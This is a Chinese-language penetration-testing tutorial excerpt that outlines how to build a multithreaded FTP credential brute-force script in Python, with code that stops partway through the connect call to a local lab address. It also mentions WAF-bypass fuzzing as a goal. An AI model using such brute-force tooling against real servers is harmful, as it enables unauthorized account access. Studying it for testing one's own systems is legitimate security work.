1.概述:
知识点:
协议模块使用,Request 爬虫技术,简易多线程技术,编码技术,Bypass 后门技术
目的:
掌握利用强大的模块实现各种协议连接操作(爆破或利用等),配合 Fuzz 吊打 WAF 等
2.简单多线程技术、FTP 模块实现协议爆破脚本:
queue,threading 模块使用、ftplib 模块使用:遍历用户及密码字典、尝试连接执行命令判断
ftp模块使用:https://www.cnblogs.com/xiao-apple36/p/9675185.html
https://www.cnblogs.com/j6-2/p/4645490.html
多线程详解:https://blog.csdn.net/briblue/article/details/85101144
拿本地搭建的ftp服务擦尝试简单登录:
设置爆破(循环遍历读取字典):
异常处理(因为登录错误会终止脚本,需要加上以持续执行)
提高速度,增加多线程:
完整代码:
#coding:utf-8
#Author:小迪 QQ471656814
#Blog:http://www.xiaodi8.com
import ftplib
import threading
import queue
import sys
#利用Python开发其他协议爆破脚本
def ftp_check():
while not q.empty():
dict=q.get()
dict=dict.split('|')
username=dict[0]
password=dict[1]
ftp=ftplib.FTP()
try:
ftp.connect('192.168.0.101',